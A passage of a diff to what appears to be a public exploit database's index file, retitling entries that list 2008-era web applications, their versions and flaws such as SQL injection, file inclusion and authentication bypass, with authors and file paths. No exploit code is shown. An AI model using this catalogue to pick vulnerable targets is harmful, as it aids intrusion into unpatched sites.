Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0 +6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 - File Disclosure / Code Execution",2008-10-12,muuratsalo,php,webapps,0 6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure",2008-10-12,GoLd_M,php,webapps,0 6735,platforms/php/webapps/6735.php,"Globsy 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0 6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - 'index.php cat' SQL Injection",2008-10-12,Hakxer,php,webapps,0 @@ -19710,13 +19713,13 @@ id,file,description,date,author,platform,type,port 6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection",2008-10-23,"CWH Underground",php,webapps,0 6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin",2008-10-23,"CWH Underground",php,webapps,0 6821,platforms/php/webapps/6821.txt,"miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion",2008-10-23,StAkeR,php,webapps,0 -6822,platforms/php/webapps/6822.txt,"websvn 2.0 - (Cross-Site Scripting / File Handling/Code Execution) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0 +6822,platforms/php/webapps/6822.txt,"websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution",2008-10-23,"GulfTech Security",php,webapps,0 6823,platforms/php/webapps/6823.txt,"SiteEngine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0 6826,platforms/php/webapps/6826.txt,"Joomla! Component archaic binary Gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps,0 6827,platforms/php/webapps/6827.txt,"Joomla! Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,php,webapps,0 6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'EditUrl.php url' SQL Injection",2008-10-24,yassine_enp,php,webapps,0 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,php,webapps,0 -6833,platforms/php/webapps/6833.txt,"phpdaily - (SQL Injection / Cross-Site Scripting / lfd) Multiple Vulnerabilities",2008-10-24,0xFFFFFF,php,webapps,0 +6833,platforms/php/webapps/6833.txt,"phpdaily - SQL Injection / Cross-Site Scripting / Local File Download",2008-10-24,0xFFFFFF,php,webapps,0 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - (download id) Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0 6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injection",2008-10-25,G4N0K,php,webapps,0 @@ -19731,7 +19734,7 @@ id,file,description,date,author,platform,type,port 6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles - 'id' SQL Injection",2008-10-27,boom3rang,php,webapps,0 6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - (langage) Local File Inclusion",2008-10-27,x0r,php,webapps,0 6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - (category_id) Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0 -6853,platforms/php/webapps/6853.txt,"questcms - (Cross-Site Scripting / Directory Traversal / SQL Injection) Multiple Vulnerabilities",2008-10-27,d3b4g,php,webapps,0 +6853,platforms/php/webapps/6853.txt,"questcms - Cross-Site Scripting / Directory Traversal / SQL Injection",2008-10-27,d3b4g,php,webapps,0 6854,platforms/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' SQL Injection",2008-10-27,ExSploiters,php,webapps,0 6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps,0 6856,platforms/php/webapps/6856.txt,"e107 Plugin BLOG Engine 2.1.4 - SQL Injection",2008-10-28,ZoRLu,php,webapps,0 @@ -19833,10 +19836,10 @@ id,file,description,date,author,platform,type,port 6967,platforms/php/webapps/6967.txt,"MatPo Link 1.2b - (view.php id) SQL Injection",2008-11-03,ZoRLu,php,webapps,0 6968,platforms/php/webapps/6968.txt,"Acc Autos 4.0 - Insecure Cookie Handling",2008-11-03,x0r,php,webapps,0 6969,platforms/php/webapps/6969.txt,"Apoll 0.7b - (Authentication Bypass) SQL Injection",2008-11-03,ZoRLu,php,webapps,0 -6971,platforms/php/webapps/6971.txt,"MatPo Link 1.2b - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-03,Hakxer,php,webapps,0 +6971,platforms/php/webapps/6971.txt,"MatPo Link 1.2b - Blind SQL Injection / Cross-Site Scripting",2008-11-03,Hakxer,php,webapps,0 6972,platforms/php/webapps/6972.txt,"pppBlog 0.3.11 - (randompic.php) File Disclosure",2008-11-03,JosS,php,webapps,0 6973,platforms/php/webapps/6973.txt,"TBmnetCMS 1.0 - (index.php content) Local File Inclusion",2008-11-04,d3v1l,php,webapps,0 -6974,platforms/php/webapps/6974.txt,"WEBBDOMAIN WebShop 1.02 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-04,G4N0K,php,webapps,0 +6974,platforms/php/webapps/6974.txt,"WEBBDOMAIN WebShop 1.02 - SQL Injection / Cross-Site Scripting",2008-11-04,G4N0K,php,webapps,0 6975,platforms/php/webapps/6975.txt,"Joomla! Component VirtueMart Google Base 1.1 - Remote File Inclusion",2008-11-04,NoGe,php,webapps,0 6976,platforms/php/webapps/6976.txt,"Joomla! Component ongumatimesheet20 4b - Remote File Inclusion",2008-11-04,NoGe,php,webapps,0 6977,platforms/php/webapps/6977.txt,"WEBBDOMAIN Post Card 1.02 - 'catid' SQL Injection",2008-11-04,"Hussin X",php,webapps,0 @@ -19887,7 +19890,7 @@ id,file,description,date,author,platform,type,port 7024,platforms/php/webapps/7024.txt,"DELTAScripts PHP Links 1.3 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 7025,platforms/php/webapps/7025.txt,"DELTAScripts PHP Shop 1.0 - (Authentication Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery - (ctg) SQL Injection",2008-11-06,"Hussin X",php,webapps,0 -7027,platforms/php/webapps/7027.txt,"Prozilla Software Directory - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0 +7027,platforms/php/webapps/7027.txt,"Prozilla Software Directory - Cross-Site Scripting / SQL Injection",2008-11-06,G4N0K,php,webapps,0 7028,platforms/php/webapps/7028.txt,"TurnkeyForms Entertainment Portal 2.0 - Insecure Cookie Handling",2008-11-07,G4N0K,php,webapps,0 7029,platforms/php/webapps/7029.txt,"TurnkeyForms Business Survey Pro 1.0 - 'id' SQL Injection",2008-11-07,G4N0K,php,webapps,0 7030,platforms/php/webapps/7030.txt,"Mole Group Pizza - (manufacturers_id) Script SQL Injection",2008-11-07,InjEctOr5,php,webapps,0 @@ -19895,7 +19898,7 @@ id,file,description,date,author,platform,type,port 7032,platforms/php/webapps/7032.txt,"U&M Software Signup 1.1 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0 7033,platforms/php/webapps/7033.txt,"U&M Software JustBookIt 1.0 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0 7034,platforms/php/webapps/7034.txt,"U&M Software Event Lister 1.0 - Authentication Bypass",2008-11-07,G4N0K,php,webapps,0 -7035,platforms/php/webapps/7035.txt,"TurnkeyForms Local Classifieds - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-11-07,TR-ShaRk,php,webapps,0 +7035,platforms/php/webapps/7035.txt,"TurnkeyForms Local Classifieds - Cross-Site Scripting / SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0 7038,platforms/php/webapps/7038.txt,"Joomla! Component ClickHeat 1.0.1 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0 7039,platforms/php/webapps/7039.txt,"Joomla! Component Recly!Competitions 1.0.0 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0 7040,platforms/php/webapps/7040.txt,"Joomla! Component Feederator 1.0.5 - Multiple Remote File Inclusion",2008-11-07,NoGe,php,webapps,0 @@ -19912,7 +19915,7 @@ id,file,description,date,author,platform,type,port 7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 - 'id' SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0 7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - (Parent) SQL Injection",2008-11-07,G4N0K,php,webapps,0 7057,platforms/php/webapps/7057.pl,"MemHT Portal 4.0 - Remote Code Execution",2008-11-08,Ams,php,webapps,0 -7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0 +7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 - Arbitrary File Upload / Cross-Site Scripting",2008-11-08,ZoRLu,php,webapps,0 7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion",2008-11-08,BugReport.IR,php,webapps,0 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,php,webapps,0 7062,platforms/php/webapps/7062.txt,"Zeeways ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0 @@ -19927,8 +19930,8 @@ id,file,description,date,author,platform,type,port 7071,platforms/php/webapps/7071.txt,"ExoPHPDesk 1.2 Final - (Authentication Bypass) SQL Injection",2008-11-09,Cyber-Zone,php,webapps,0 7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 - (bannerclick.php adid) SQL Injection",2008-11-09,"Hussin X",php,webapps,0 7074,platforms/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,php,webapps,0 -7075,platforms/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-09,"Andreas Kurtz",jsp,webapps,0 -7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - (Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload) Multiple Vulnerabilities",2008-11-10,USH,php,webapps,0 +7075,platforms/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - Authentication Bypass / SQL Injection / Cross-Site Scripting",2008-11-09,"Andreas Kurtz",jsp,webapps,0 +7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload",2008-11-10,USH,php,webapps,0 7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 - 'Tipo' Parameter Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0 7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - 'PostID' Parameter SQL Injection",2008-11-10,boom3rang,php,webapps,0 7079,platforms/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0 @@ -20021,25 +20024,25 @@ id,file,description,date,author,platform,type,port 7200,platforms/php/webapps/7200.txt,"PG Real Estate - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7201,platforms/php/webapps/7201.txt,"Pilot Group PG Roommate Finder Solution - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7202,platforms/php/webapps/7202.txt,"PG Job Site - (poll_view_id) Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0 -7204,platforms/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0 +7204,platforms/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0 7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0 7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0 7208,platforms/php/webapps/7208.txt,"Netartmedia Real Estate Portal 1.2 - (ad_id) SQL Injection",2008-11-24,"Hussin X",php,webapps,0 7210,platforms/php/webapps/7210.txt,"Goople CMS 1.7 - Arbitrary Code Execution",2008-11-24,x0r,php,webapps,0 7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection",2008-11-24,G4N0K,php,webapps,0 7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection",2008-11-24,G4N0K,php,webapps,0 -7214,platforms/php/webapps/7214.txt,"ftpzik - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-11-24,JIKO,php,webapps,0 -7215,platforms/php/webapps/7215.txt,"bandwebsite 1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-24,ZoRLu,php,webapps,0 +7214,platforms/php/webapps/7214.txt,"ftpzik - Cross-Site Scripting / Local File Inclusion",2008-11-24,JIKO,php,webapps,0 +7215,platforms/php/webapps/7215.txt,"bandwebsite 1.5 - SQL Injection / Cross-Site Scripting",2008-11-24,ZoRLu,php,webapps,0 7216,platforms/php/webapps/7216.txt,"WebStudio CMS - 'index.php pageid' Blind SQL Injection",2008-11-24,"Glafkos Charalambous",php,webapps,0 7217,platforms/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 (Windows) - Remote Code Execution",2008-11-24,girex,php,webapps,0 -7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-11-24,Osirys,php,webapps,0 +7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a - Remote File Inclusion / SQL Injection",2008-11-24,Osirys,php,webapps,0 7221,platforms/php/webapps/7221.txt,"Pie Web M{a_e}sher 0.5.3 - Multiple Remote File Inclusion",2008-11-24,NoGe,php,webapps,0 7222,platforms/php/webapps/7222.txt,"WebStudio eHotel - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0 7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0 7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 - (categorie.php cat_id) SQL Injection",2008-11-25,cOndemned,php,webapps,0 7225,platforms/php/webapps/7225.txt,"Pie Web m{a_e}sher mod rss 0.1 - Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0 -7227,platforms/php/webapps/7227.txt,"chipmunk topsites - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 -7228,platforms/php/webapps/7228.txt,"Clean CMS 1.5 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 +7227,platforms/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps,0 +7228,platforms/php/webapps/7228.txt,"Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps,0 7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - (config_path) Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0 7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection",2008-11-25,JosS,php,webapps,0 7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0 @@ -20055,7 +20058,7 @@ id,file,description,date,author,platform,type,port 7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0 7242,platforms/php/webapps/7242.txt,"Web Calendar System 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0 7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Blind SQL Injection (2)",2008-11-27,Stack,php,webapps,0 -7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - (SQL Injection / Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities",2008-11-27,Pouya_Server,php,webapps,0 +7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure",2008-11-27,Pouya_Server,php,webapps,0 7245,platforms/php/webapps/7245.txt,"Ocean12 Membership Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 7246,platforms/php/webapps/7246.txt,"Ocean12 Poll Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 7247,platforms/php/webapps/7247.txt,"Ocean12 Calendar Manager Gold - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 @@ -20068,7 +20071,7 @@ id,file,description,date,author,platform,type,port 7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 Beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0 7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - 'id' SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0 7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro - Database Disclosure",2008-11-27,Stack,php,webapps,0 -7259,platforms/asp/webapps/7259.txt,"comersus asp shopping cart - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,asp,webapps,0 +7259,platforms/asp/webapps/7259.txt,"Comersus ASP Shopping Cart - File Disclosure / Cross-Site Scripting",2008-11-27,Bl@ckbe@rD,asp,webapps,0 7260,platforms/php/webapps/7260.txt,"Basic-CMS - 'acm2000.mdb' Remote Database Disclosure",2008-11-28,Stack,php,webapps,0 7261,platforms/php/webapps/7261.txt,"Basic-CMS - 'index.php id' Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - (Authentication Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0 @@ -20109,7 +20112,7 @@ id,file,description,date,author,platform,type,port 7303,platforms/php/webapps/7303.txt,"Quick Tree View .NET 3.1 - (qtv.mdb) Database Disclosure",2008-11-30,Cyber-Zone,php,webapps,0 7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",php,webapps,0 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0 -7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - (SQL Injection / Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0 +7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - SQL Injection / Arbitrary File Upload / Authentication Bypass",2008-11-30,NoGe,php,webapps,0 7308,platforms/php/webapps/7308.txt,"CPCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion",2008-11-30,NoGe,php,webapps,0 7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) SQL Injection",2008-12-01,JIKO,php,webapps,0 @@ -20131,9 +20134,9 @@ id,file,description,date,author,platform,type,port 7333,platforms/php/webapps/7333.txt,"Rae Media Contact MS - (Authentication Bypass) SQL Injection",2008-12-03,b3hz4d,php,webapps,0 7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - (pfad) Remote File Inclusion",2008-12-03,NoGe,php,webapps,0 7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 - (cct_base) Multiple Remote File Inclusion",2008-12-04,cOndemned,php,webapps,0 -7337,platforms/php/webapps/7337.txt,"wbstreet 1.0 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-04,"CWH Underground",php,webapps,0 +7337,platforms/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",php,webapps,0 7338,platforms/php/webapps/7338.txt,"User Engine Lite ASP - 'users.mdb' Database Disclosure",2008-12-04,AlpHaNiX,php,webapps,0 -7339,platforms/php/webapps/7339.txt,"template creature - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-04,ZoRLu,php,webapps,0 +7339,platforms/php/webapps/7339.txt,"template creature - SQL Injection / File Disclosure",2008-12-04,ZoRLu,php,webapps,0 7340,platforms/asp/webapps/7340.txt,"Easy News Content Management - 'News.mdb' Database Disclosure",2008-12-04,BeyazKurt,asp,webapps,0 7341,platforms/php/webapps/7341.txt,"lcxbbportal 0.1 alpha 2 - Remote File Inclusion",2008-12-04,NoGe,php,webapps,0 7342,platforms/php/webapps/7342.txt,"My Simple Forum 3.0 - (index.php action) Local File Inclusion",2008-12-04,cOndemned,php,webapps,0 @@ -20141,14 +20144,14 @@ id,file,description,date,author,platform,type,port 7344,platforms/php/webapps/7344.txt,"Gravity GTD 0.4.5 - (rpc.php objectname) Local File Inclusion / Remote Code Execution",2008-12-04,dun,php,webapps,0 7345,platforms/php/webapps/7345.txt,"BNCwi 1.04 - Local File Inclusion",2008-12-04,dun,php,webapps,0 7346,platforms/php/webapps/7346.txt,"Multiple Membership Script 2.5 - 'id' SQL Injection",2008-12-05,ViRuS_HaCkErS,php,webapps,0 -7348,platforms/asp/webapps/7348.txt,"merlix educate servert - (Authentication Bypass/File Disclosure) Multiple Vulnerabilities",2008-12-05,ZoRLu,asp,webapps,0 +7348,platforms/asp/webapps/7348.txt,"merlix educate servert - Authentication Bypass / File Disclosure",2008-12-05,ZoRLu,asp,webapps,0 7349,platforms/asp/webapps/7349.txt,"RankEm - 'rankup.asp siteID' SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 7350,platforms/asp/webapps/7350.txt,"RankEm - (Authentication Bypass) SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 -7351,platforms/php/webapps/7351.txt,"nightfall personal diary 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,php,webapps,0 +7351,platforms/php/webapps/7351.txt,"nightfall personal diary 1.0 - Cross-Site Scripting / File Disclosure",2008-12-05,AlpHaNiX,php,webapps,0 7352,platforms/php/webapps/7352.txt,"Merlix Teamworx Server - (File Disclosure/Bypass) Multiple Remote Vulnerabilities",2008-12-05,ZoRLu,php,webapps,0 7353,platforms/asp/webapps/7353.txt,"Cold BBS - 'cforum.mdb' Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps,0 7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator .v.3 - Insecure Upload",2008-12-05,ahmadbady,php,webapps,0 -7356,platforms/asp/webapps/7356.txt,"ASP AutoDealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-05,AlpHaNiX,asp,webapps,0 +7356,platforms/asp/webapps/7356.txt,"ASP AutoDealer - SQL Injection / File Disclosure",2008-12-05,AlpHaNiX,asp,webapps,0 7357,platforms/asp/webapps/7357.txt,"ASP PORTAL - Multiple SQL Injections",2008-12-05,AlpHaNiX,asp,webapps,0 7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - (news.mdb) Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0 7360,platforms/asp/webapps/7360.txt,"ASP AutoDealer - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 @@ -20163,12 +20166,12 @@ id,file,description,date,author,platform,type,port 7370,platforms/asp/webapps/7370.txt,"Natterchat 1.12 - (Natterchat112.mdb) Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0 7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7372,platforms/asp/webapps/7372.txt,"Ikon ADManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 -7373,platforms/asp/webapps/7373.txt,"aspmanage banners - (Arbitrary File Upload / File Disclosure) Multiple Vulnerabilities",2008-12-07,ZoRLu,asp,webapps,0 +7373,platforms/asp/webapps/7373.txt,"aspmanage banners - Arbitrary File Upload / File Disclosure",2008-12-07,ZoRLu,asp,webapps,0 7374,platforms/php/webapps/7374.txt,"Mini Blog 1.0.1 - 'index.php' Multiple Local File Inclusion",2008-12-07,cOndemned,php,webapps,0 7375,platforms/php/webapps/7375.txt,"Mini-CMS 1.0.1 - 'index.php' Multiple Local File Inclusion",2008-12-07,cOndemned,php,webapps,0 7376,platforms/asp/webapps/7376.txt,"QMail Mailing List Manager 1.2 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7377,platforms/php/webapps/7377.txt,"PHPmyGallery Gold 1.51 - 'index.php' Directory Traversal",2008-12-07,zAx,php,webapps,0 -7378,platforms/asp/webapps/7378.txt,"asp talk - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-07,Bl@ckbe@rD,asp,webapps,0 +7378,platforms/asp/webapps/7378.txt,"asp talk - SQL Injection / Cross-Site Scripting",2008-12-07,Bl@ckbe@rD,asp,webapps,0 7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 - 'Filename' Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps,0 7380,platforms/php/webapps/7380.txt,"XOOPS 2.3.1 - Multiple Local File Inclusion",2008-12-08,DSecRG,php,webapps,0 7381,platforms/php/webapps/7381.txt,"siu guarani - Multiple Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps,0 @@ -20176,23 +20179,23 @@ id,file,description,date,author,platform,type,port 7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site Arbitrary File Upload",2008-12-08,"Michael Brooks",php,webapps,0 7385,platforms/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection",2008-12-08,Cnaph,php,webapps,0 7386,platforms/php/webapps/7386.pl,"phpBB 3 - (Mod Tag Board 4) Blind SQL Injection",2008-12-08,StAkeR,php,webapps,0 -7388,platforms/php/webapps/7388.txt,"webcaf 1.4 - (Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities",2008-12-08,dun,php,webapps,0 +7388,platforms/php/webapps/7388.txt,"webcaf 1.4 - Local File Inclusion / Remote Code Execution",2008-12-08,dun,php,webapps,0 7390,platforms/asp/webapps/7390.txt,"dotnetindex Professional Download Assistant 0.1 - (Authentication Bypass) SQL Injection",2008-12-09,ZoRLu,asp,webapps,0 7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 - (Authentication Bypass) SQL Injection",2008-12-09,AlpHaNiX,asp,webapps,0 -7392,platforms/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities",2008-12-09,ZoRLu,php,webapps,0 +7392,platforms/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 - Remote File Inclusion / Local File Inclusion",2008-12-09,ZoRLu,php,webapps,0 7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 - (index.php rubid) SQL Injection",2008-12-09,SuB-ZeRo,php,webapps,0 7396,platforms/php/webapps/7396.txt,"Netref 4.0 - Multiple SQL Injections",2008-12-09,SuB-ZeRo,php,webapps,0 7397,platforms/php/webapps/7397.txt,"ProQuiz 1.0 - (Authentication Bypass) SQL Injection",2008-12-09,Osirys,php,webapps,0 -7398,platforms/asp/webapps/7398.txt,"postecards - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-09,AlpHaNiX,asp,webapps,0 +7398,platforms/asp/webapps/7398.txt,"postecards - SQL Injection / File Disclosure",2008-12-09,AlpHaNiX,asp,webapps,0 7399,platforms/php/webapps/7399.txt,"PHPmyGallery 1.5beta - (common-tpl-vars.php) Local File Inclusion / Remote File Inclusion",2008-12-09,CoBRa_21,php,webapps,0 -7400,platforms/php/webapps/7400.txt,"PHP Multiple Newsletters 2.7 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-09,ahmadbady,php,webapps,0 +7400,platforms/php/webapps/7400.txt,"PHP Multiple Newsletters 2.7 - Local File Inclusion / Cross-Site Scripting",2008-12-09,ahmadbady,php,webapps,0 7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 - (htmpl_admin.cgi help) Command Execution",2008-12-10,ZeN,cgi,webapps,0 7406,platforms/php/webapps/7406.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation",2008-12-10,s4avrd0w,php,webapps,0 7407,platforms/php/webapps/7407.txt,"WebMaster Marketplace - 'member.php u' SQL Injection",2008-12-10,"Hussin X",php,webapps,0 -7408,platforms/php/webapps/7408.txt,"living Local 1.1 - (Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0 -7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0 +7408,platforms/php/webapps/7408.txt,"living Local 1.1 - Cross-Site Scripting / Arbitrary File Upload",2008-12-10,Bgh7,php,webapps,0 +7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - 